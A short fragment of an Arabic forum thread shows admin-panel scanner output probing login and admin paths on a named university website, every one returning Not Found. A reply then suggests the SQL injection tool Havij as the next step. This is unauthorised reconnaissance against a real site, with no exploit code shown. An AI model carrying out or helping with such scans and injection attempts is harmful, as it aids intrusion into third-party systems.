[-] Not Found <- http://www.mcny.edu/adm/admloginuser.php
[-] Not Found <- http://www.mcny.edu/admloginuser.php
[-] Not Found <- http://www.mcny.edu/admin2.php
[-] Not Found <- http://www.mcny.edu/admin2/login.php
[-] Not Found <- http://www.mcny.edu/admin2/index.php
[-] Not Found <- http://www.mcny.edu/adm/index.php
[-] Not Found <- http://www.mcny.edu/adm.php
[-] Not Found <- http://www.mcny.edu/affiliate.php
[-] Not Found <- http://www.mcny.edu/adm_auth.php
[-] Not Found <- http://www.mcny.edu/memberadmin.php
[-] Not Found <- http://www.mcny.edu/administratorlogin.php
أخي العزيز
جرب إستعمال برنامج havij
وقولي ماهي النتيجة
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.
أعلى